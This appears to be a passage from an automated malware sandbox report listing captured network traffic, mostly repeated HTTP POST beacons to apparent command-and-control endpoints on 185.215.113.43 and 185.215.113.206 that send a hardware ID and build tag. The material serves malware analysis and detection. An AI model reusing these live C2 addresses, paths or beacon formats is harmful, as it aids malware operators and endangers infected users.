2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 2d 2d 0d 0a Data Ascii: ------HDHCFIJEGCAKJJKEHJJEContent-Disposition: form-data; name="hwid"90DA2016EDA11720009369------HDHCFIJEGCAKJJKEHJJEContent-Disposition: form-data; name="build"tale------HDHCFIJEGCAKJJKEHJJE--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 30 44 41 32 30 31 36 45 44 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 2d 2d 0d 0a Data Ascii: ------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="hwid"90DA2016EDA11720009369------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="build"tale------HJEHIJEBKEBFBFHIIDHI--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCBKKFIJJJECAAFCGIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 43 42 4b 4b 46 49 4a 4a 4a 45 43 41 41 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 30 44 41 32 30 31 36 45 44 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 42 4b 4b 46 49 4a 4a 4a 45 43 41 41 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 42 4b 4b 46 49 4a 4a 4a 45 43 41 41 46 43 47 49 2d 2d 0d 0a Data Ascii: ------CFHCBKKFIJJJECAAFCGIContent-Disposition: form-data; name="hwid"90DA2016EDA11720009369------CFHCBKKFIJJJECAAFCGIContent-Disposition: form-data; name="build"tale------CFHCBKKFIJJJECAAFCGI--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 30 44 41 32 30 31 36 45 44 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 2d 2d 0d 0a Data Ascii: ------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="hwid"90DA2016EDA11720009369------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="build"tale------FHCGCFHDHIIIDGCAAEGD--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
